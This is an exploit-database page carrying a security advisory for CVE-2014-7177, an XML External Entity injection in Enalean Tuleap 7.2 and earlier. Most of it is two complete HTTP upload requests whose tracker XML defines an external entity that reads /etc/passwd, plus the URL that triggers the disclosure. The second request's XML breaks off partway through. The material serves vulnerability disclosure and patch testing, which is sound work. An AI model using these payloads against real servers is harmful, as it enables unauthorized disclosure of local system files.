Menu

Search for hundreds of thousands of exploits

"Enalean Tuleap 7.2 - XML External Entity File Disclosure"

Author

Exploit author

Portcullis

Platform

Exploit platform

php

Release date

Exploit published date

2014-10-28

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz

Details:

A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability.

Vulnerability 1:

1) Upload a XXE using the following request:


POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25777276834778
Content-Length: 10561

-----------------------------25777276834778
Content-Disposition: form-data; name="group_id"

102
-----------------------------25777276834778
Content-Disposition: form-data; name="func"

docreate
-----------------------------25777276834778
Content-Disposition: form-data; name="group_id_template"

100
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_prjname"

Commencez à taper
-----------------------------25777276834778
Content-Disposition: form-data; name="create_mode"

xml
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="xee.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<tracker instantiate_for_new_projects="0">
  <name>123&xxe;</name>
  <item_name>e123&xxe;</item_name>
  <description>123&xxe;</description>
  <cannedResponses/>
  <formElements>
    <formElement type="file" ID="F1" rank="0" use_it="0">
      <name>attachment</name>
      <label>Attachments</label>
    </formElement>
    <formElement type="text" ID="F2" rank="2" use_it="0">
      <name>details</name>
      <label>Original Submission</label>
      <description>A full description of the artifact&xxe;</description>
      <properties rows="7" cols="60"/>
    </formElement>
    <formElement type="string" ID="F3" rank="4" use_it="0" required="1">
      <name>summary</name>
      <label>Summary</label>
      <description>One line description of the artifact&xxe;</description>
      <properties maxchars="150" size="60"/>
    </formElement>
    <formElement type="tbl" ID="F4" rank="6" use_it="0">
      <name>cc</name>
      <label>CC</label>
      <properties hint="Type in a search term"/>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
    <formElement type="sb" ID="F7" rank="12" use_it="0">
      <name>status_id</name>
      <label>Status</label>
      <description>Artifact Status</description>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F7-V0" label="Open">
            <description>The artifact has been submitted&xxe;</description>
          </item>
          <item ID="F7-V1" label="Closed">
            <description>The artifact is no longer active. See the Resolution field for details on how it was resolved.&xxe;</description>
          </item>
        </items>
      </bind>
    </formElement>
    <formElement type="sb" ID="F8" rank="14" use_it="0">
      <name>assigned_to</name>
      <label>Assigned to</label>
      <description>Who is in charge of solving the artifact&xxe;</description>
      <bind type="users">
        <items>
          <item label="group_members"/>
        </items>
      </bind>
    </formElement>
    <formElement type="sb" ID="F11" rank="20" use_it="0">
      <name>category_id</name>
      <label>Category</label>
      <description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
    <formElement type="sb" ID="F12" rank="22" use_it="0">
      <name>severity</name>
      <label>Priority</label>
      <description>How quickly the artifact must be completed</description>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F12-V0" label="1 - Lowest"/>
          <item ID="F12-V1" label="2"/>
          <item ID="F12-V2" label="3"/>
          <item ID="F12-V3" label="4"/>
          <item ID="F12-V4" label="5 - Medium"/>
          <item ID="F12-V5" label="6"/>
          <item ID="F12-V6" label="7"/>
          <item ID="F12-V7" label="8"/>
          <item ID="F12-V8" label="9 - Highest"/>
        </items>
        <decorators>
          <decorator REF="F12-V0" r="255" g="255" b="204"/>
          <decorator REF="F12-V1" r="255" g="255" b="102"/>
          <decorator REF="F12-V2" r="255" g="204" b="0"/>
          <decorator REF="F12-V3" r="255" g="153" b="0"/>
          <decorator REF="F12-V4" r="255" g="102" b="0"/>
          <decorator REF="F12-V5" r="255" g="51" b="0"/>
          <decorator REF="F12-V6" r="204" g="51" b="0"/>
          <decorator REF="F12-V7" r="153" g="0" b="0"/>
          <decorator REF="F12-V8" r="51" g="0" b="0"/>
        </decorators>
      </bind>
    </formElement>
    <formElement type="sb" ID="F13" rank="24" use_it="0">
      <name>stage&xxe;</name>
      <label>Stage&xxe;</label>
      <description>Stage in the life cycle of the artifact&xxe;</description>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F13-V0" label="New">
            <description>The artifact has just been submitted</description>
          </item>
          <item ID="F13-V1" label="Analyzed">
            <description>The cause of the artifact has been identified and documented</description>
          </item>
          <item ID="F13-V2" label="Accepted">
            <description>The artifact will be worked on.</description>
          </item>
          <item ID="F13-V3" label="Under Implementation">
            <description>The artifact is being worked on.</description>
          </item>
          <item ID="F13-V4" label="Ready for Review">
            <description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
          </item>
          <item ID="F13-V5" label="Ready for Test">
            <description>Updated/Created software is ready to be included in the next build</description>
          </item>
          <item ID="F13-V6" label="In Test">
            <description>Updated/Created software is in the build and is ready to enter the test phase</description>
          </item>
          <item ID="F13-V7" label="Approved">
            <description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
          </item>
          <item ID="F13-V8" label="Declined">
            <description>The artifact was not accepted.</description>
          </item>
          <item ID="F13-V9" label="Done">
            <description>The artifact is closed.</description>
          </item>
        </items>
      </bind>
    </formElement>
  </formElements>
  <semantics>
    <semantic type="tooltip"/>
  </semantics>
  <reports>
    <report is_default="0">
      <name>Default</name>
      <description>The system default artifact report</description>
      <criterias/>
      <renderers>
        <renderer type="table" rank="0" chunksz="15" multisort="15">
          <name>Results</name>
          <columns/>
        </renderer>
        <renderer type="plugin_graphontrackersv5" rank="1">
          <name>Default</name>
          <description>Graphic Report By Default For Support Requests</description>
          <charts/>
        </renderer>
      </renderers>
    </report>
  </reports>
  <workflow/>
  <permissions>
    <permission scope="field" REF="F1" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F1" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F1" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F4" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F4" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F4" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F7" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F7" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F7" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F12" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F12" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F12" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
  </permissions>
</tracker>

-----------------------------25777276834778
Content-Disposition: form-data; name="name"

123
-----------------------------25777276834778
Content-Disposition: form-data; name="description"

123
-----------------------------25777276834778
Content-Disposition: form-data; name="itemname"

e123
-----------------------------25777276834778
Content-Disposition: form-data; name="Create"

Créer
-----------------------------25777276834778--


2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:


https://[ip]/plugins/tracker/?group_id=102&tracker=11


3) Using retrieved tracker number, a XXE can be trigerred by visiting the following URL:


https://[ip]/plugins/tracker/?tracker=11&func=admin-formElements


Vulnerability 2

1) Upload a XXE using the following request:

<
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=e619b58add92383b3647ee5ba68c4a79
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------12077103611061
Content-Length: 25588

-----------------------------12077103611061
Content-Disposition: form-data; name="group_id"

102
-----------------------------12077103611061
Content-Disposition: form-data; name="func"

docreate
-----------------------------12077103611061
Content-Disposition: form-data; name="group_id_template"

100
-----------------------------12077103611061
Content-Disposition: form-data; name="tracker_new_prjname"

Commencez à taper
-----------------------------12077103611061
Content-Disposition: form-data; name="create_mode"

xml
-----------------------------12077103611061
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="tracker_bugs.xml"
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<tracker instantiate_for_new_projects="0">
  <name>Bugs</name>
  <item_name>bug</item_name>
  <description>Bugs Tracker</description>
  <cannedResponses/>
  <formElements>
    <formElement type="column" ID="F1" rank="120">
      <name>column8</name>
      <label>Column Top 1</label>
      <formElements>
        <formElement type="aid" ID="F2" rank="0">
          <name>artifact_id</name>
          <label>Artifact ID</label>
          <description>Unique artifact identifier&xxe;</description>
        </formElement>
        <formElement type="subby" ID="F3" rank="1">
          <name>submitted_by</name>
          <label>Submitted by</label>
          <description>User who originally submitted the artifact&xxe;</description>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="column" ID="F4" rank="121">
      <name>column10&xxe;</name>
      <label>Column Top 2&xxe;</label>
      <formElements>
        <formElement type="lud" ID="F5" rank="0">
          <name>last_update_date</name>
          <label>Last Modified On&xxe;</label>
          <description>Date and time of the latest modification in an artifact&xxe;</description>
        </formElement>
        <formElement type="subon" ID="F6" rank="2">
          <name>open_date&xxe;</name>
          <label>Submitted on&xxe;</label>
          <description>Date and time for the initial artifact submission&xxe;</description>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F7" rank="132" required="1">
      <name>fieldset_1</name>
      <label>Details</label>
      <description>fieldset_default_desc_key</description>
      <formElements>
        <formElement type="string" ID="F8" rank="0" required="1">
          <name>summary</name>
          <label>Summary</label>
          <description>One line description of the artifact</description>
          <properties maxchars="150" size="61"/>
        </formElement>
        <formElement type="text" ID="F9" rank="7">
          <name>details</name>
          <label>Original Submission</label>
          <description>A full description of the artifact</description>
          <properties rows="7" cols="80"/>
        </formElement>
        <formElement type="column" ID="F10" rank="8">
          <name>column10</name>
          <label>Column Details 1</label>
          <formElements>
            <formElement type="sb" ID="F11" rank="0">
              <name>severity</name>
              <label>Severity</label>
              <description>Impact of the artifact on the system (Critical, Major,...)</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F11-V0" label="1 - Ordinary"/>
                  <item ID="F11-V1" label="2"/>
                  <item ID="F11-V2" label="3"/>
                  <item ID="F11-V3" label="4"/>
                  <item ID="F11-V4" label="5 - Major"/>
                  <item ID="F11-V5" label="6"/>
                  <item ID="F11-V6" label="7"/>
                  <item ID="F11-V7" label="8"/>
                  <item ID="F11-V8" label="9 - Critical"/>
                </items>
                <decorators>
                  <decorator REF="F11-V0" r="255" g="255" b="102"/>
                  <decorator REF="F11-V1" r="255" g="204" b="51"/>
                  <decorator REF="F11-V2" r="255" g="153" b="0"/>
                  <decorator REF="F11-V3" r="255" g="102" b="0"/>
                  <decorator REF="F11-V4" r="255" g="51" b="0"/>
                  <decorator REF="F11-V5" r="204" g="0" b="0"/>
                  <decorator REF="F11-V6" r="153" g="0" b="0"/>
                  <decorator REF="F11-V7" r="102" g="0" b="0"/>
                  <decorator REF="F11-V8" r="51" g="0" b="0"/>
                </decorators>
              </bind>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="column" ID="F12" rank="12">
          <name>column10</name>
          <label>Column Details 2</label>
          <formElements>
            <formElement type="sb" ID="F13" rank="0">
              <name>category</name>
              <label>Category</label>
              <description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
              <bind type="static" is_rank_alpha="0"/>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="date" ID="F14" rank="20" use_it="0">
          <name>close_date</name>
          <label>End Date</label>
          <description>End Date</description>
          <properties default_value="today"/>
        </formElement>
        <formElement type="msb" ID="F15" rank="31" use_it="0">
          <name>multi_assigned_to</name>
          <label>Assigned to (multiple)</label>
          <description>Who is in charge of this artifact</description>
          <properties size="7"/>
          <bind type="users">
            <items>
              <item label="group_members"/>
            </items>
          </bind>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F17" rank="283">
      <name>fieldset1</name>
      <label>Stage</label>
      <formElements>
        <formElement type="column" ID="F18" rank="0">
          <name>column3</name>
          <label>Stage 1</label>
          <formElements>
            <formElement type="sb" ID="F19" rank="2">
              <name>status_id</name>
              <label>Status</label>
              <description>Artifact Status</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F19-V0" label="New"/>
                  <item ID="F19-V1" label="Unconfirmed"/>
                  <item ID="F19-V2" label="Verified"/>
                  <item ID="F19-V3" label="Resolved"/>
                  <item ID="F19-V4" label="Closed"/>
                  <item ID="F19-V5" label="Reopened"/>
                </items>
              </bind>
            </formElement>
            <formElement type="sb" ID="F20" rank="5" use_it="0">
              <name>stage</name>
              <label>Stage</label>
              <description>Stage in the life cycle of the artifact</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F20-V0" label="New">
                    <description>The artifact has just been submitted</description>
                  </item>
                  <item ID="F20-V1" label="Analyzed">
                    <description>The cause of the artifact has been identified and documented</description>
                  </item>
                  <item ID="F20-V2" label="Accepted">
                    <description>The artifact will be worked on.</description>
                  </item>
                  <item ID="F20-V3" label="Under Implementation">
                    <description>The artifact is being worked on.</description>
                  </item>
                  <item ID="F20-V4" label="Ready for Review">
                    <description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
                  </item>
                  <item ID="F20-V5" label="Ready for Test">
                    <description>Updated/Created software is ready to be included in the next build</description>
                  </item>
                  <item ID="F20-V6" label="In Test">
                    <description>Updated/Created software is in the build and is ready to enter the test phase</description>
                  </item>
                  <item ID="F20-V7" label="Approved">
                    <description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
                  </item>
                  <item ID="F20-V8" label="Declined">
                    <description>The artifact was not accepted.</description>
                  </item>
                  <item ID="F20-V9" label="Done">
                    <description>The artifact is closed.</description>
                  </item>
                </items>
              </bind>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="column" ID="F21" rank="2">
          <name>column4</name>
          <label>Stage 2</label>
          <formElements>
            <formElement type="sb" ID="F22" rank="0">
              <name>resolution</name>
              <label>Resolution</label>
              <description>The resolution field indicates what happened to the bug.</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F22-V0" label="Fixed"/>
                  <item ID="F22-V1" label="Will not fix"/>
                  <item ID="F22-V2" label="Invalid"/>
                  <item ID="F22-V3" label="Later"/>
                  <item ID="F22-V4" label="Duplicate"/>
                  <item ID="F22-V5" label="Remind"/>
                  <item ID="F22-V6" label="Works for me"/>
                </items>
              </bind>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="column" ID="F23" rank="3">
          <name>column9</name>
          <label>Stage 3</label>
          <formElements>
            <formElement type="sb" ID="F24" rank="0" notifications="1">
              <name>assigned_to</name>
              <label>Assigned to</label>
              <description>Who is in charge of solving the artifact</description>
              <bind type="users">
                <items>
                  <item label="group_members"/>
                </items>
              </bind>
            </formElement>
          </formElements>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F25" rank="284">
      <name>fieldset1</name>
      <label>Attachments</label>
      <formElements>
        <formElement type="file" ID="F26" rank="0">
          <name>attachment</name>
          <label>Attachments</label>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F27" rank="286">
      <name>fieldset1</name>
      <label>References</label>
      <formElements>
        <formElement type="cross" ID="F28" rank="0">
          <name>cross_references</name>
          <label>Cross references</label>
          <description>List of items referenced by or referencing this item.</description>
        </formElement>
        <formElement type="art_link" ID="F29" rank="1" use_it="0">
          <name>references</name>
          <label>References</label>
          <properties size="30"/>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F30" rank="287">
      <name>fieldset1</name>
      <label>Permissions</label>
      <formElements>
        <formElement type="perm" ID="F31" rank="0">
          <name>permissions_on_artifact</name>
          <label>Permissions on artifact</label>
          <description>Let users groups to define who can access an artifact.</description>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="sb" ID="F32" rank="26" use_it="0">
      <name>platform</name>
      <label>Platform</label>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F32-V0" label="Linux"/>
          <item ID="F32-V1" label="Windows XP"/>
          <item ID="F32-V2" label="Solaris"/>
          <item ID="F32-V3" label="Windows 2000"/>
          <item ID="F32-V4" label="Other"/>
        </items>
      </bind>
    </formElement>
    <formElement type="sb" ID="F33" rank="28" use_it="0">
      <name>source</name>
      <label>Source</label>
      <description>Customer from which the request comes from.</description>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
    <formElement type="sb" ID="F34" rank="30" use_it="0">
      <name>version</name>
      <label>Version</label>
      <description>Product version concerned by the bug.</description>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
  </formElements>
  <semantics>
    <semantic type="title">
      <shortname>title</shortname>
      <label>Titre</label>
      <description>©finir le titre d'un artéfact</description>
      <field REF="F8"/>
    </semantic>
    <semantic type="status">
      <shortname>status</shortname>
      <label>Ã?tat</label>
      <description>©finir l'état d'un artifact</description>
      <field REF="F19"/>
      <open_values>
        <open_value REF="F19-V0"/>
        <open_value REF="F19-V1"/>
        <open_value REF="F19-V2"/>
        <open_value REF="F19-V3"/>
        <open_value REF="F19-V5"/>
      </open_values>
    </semantic>
    <semantic type="contributor">
      <shortname>contributor</shortname>
      <label>Contributor/assignee</label>
      <description>Define the contributor/assignee of an artifact</description>
      <field REF="F24"/>
    </semantic>
    <semantic type="tooltip">
      <field REF="F2"/>
      <field REF="F8"/>
      <field REF="F19"/>
    </semantic>
  </semantics>
  <reports>
    <report is_default="0">
      <name>Bugs</name>
      <description>The system default artifact report</description>
      <criterias>
        <criteria rank="0">
          <field REF="F19"/>
        </criteria>
        <criteria rank="1">
          <field REF="F24"/>
        </criteria>
        <criteria rank="2">
          <field REF="F6"/>
        </criteria>
        <criteria rank="3">
          <field REF="F2"/>
        </criteria>
        <criteria rank="4">
          <field REF="F5"/>
        </criteria>
        <criteria rank="5">
          <field REF="F8"/>
        </criteria>
        <criteria rank="6">
          <field REF="F9"/>
        </criteria>
        <criteria rank="7">
          <field REF="F22"/>
        </criteria>
        <criteria rank="8">
          <field REF="F13"/>
        </criteria>
      </criterias>
      <renderers>
        <renderer type="table" rank="0" chunksz="15" multisort="15">
          <name>Results</name>
          <columns>
            <field REF="F2"/>
            <field REF="F8"/>
            <field REF="F6"/>
            <field REF="F24"/>
            <field REF="F3"/>
          </columns>
        </renderer>
        <renderer type="plugin_graphontrackersv5" rank="1">
            <name>Charts</name>
            <description>Graphic Report</description>
            <charts>
                <chart type="pie" width="600" height="400" rank="0" base="F19">
                    <title>Status</title>
                    <description>Number of Artifacts by Status</description>
                </chart>
                <chart type="bar" width="600" height="400" rank="1" base="F11">
                    <title>Severity</title>
                    <description>Number of Artifacts by severity level</description>
                </chart>
                <chart type="pie" width="600" height="400" rank="2" base="F24">
                    <title>Assignment</title>
                    <description>Number of Artifacts by Assignee</description>
                </chart>
            </charts>
        </renderer>
      </renderers>
    </report>
    <report is_default="0">
      <name>Default</name>
      <description>The system default artifact report</description>
      <criterias>
        <criteria rank="0">
          <field REF="F19"/>
        </criteria>
        <criteria rank="1">
          <field REF="F24"/>
        </criteria>
        <criteria rank="2">
          <field REF="F6"/>
        </criteria>
        <criteria rank="3">
          <field REF="F2"/>
        </criteria>
        <criteria rank="4">
          <field REF="F13"/>
        </criteria>
      </criterias>
      <renderers>
        <renderer type="table" rank="0" chunksz="15" multisort="15">
          <name>Results</name>
          <columns>
            <field REF="F2"/>
            <field REF="F8"/>
            <field REF="F6"/>
            <field REF="F24"/>
            <field REF="F3"/>
          </columns>
        </renderer>
      </renderers>
    </report>
  </reports>
  <workflow>
    <field_id REF="F19"/>
    <is_used>1</is_used>
    <transitions>
        <transition>
            <from_id REF="null"/>
            <to_id REF="F19-V0"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V1"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V2"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V1"/>
            <to_id REF="F19-V2"/>
        </transition>
        <transition>
            <from_id REF="F19-V1"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V3"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V4"/>
            <to_id REF="F19-V5"/>
        </transition>
        <transition>
            <from_id REF="F19-V5"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V5"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V1"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V2"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V2"/>
            <to_id REF="F19-V4"/>
        </transition>
    </transitions>
  </workflow>
  <permissions>
    <permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F5" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F6" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F9" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F9" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
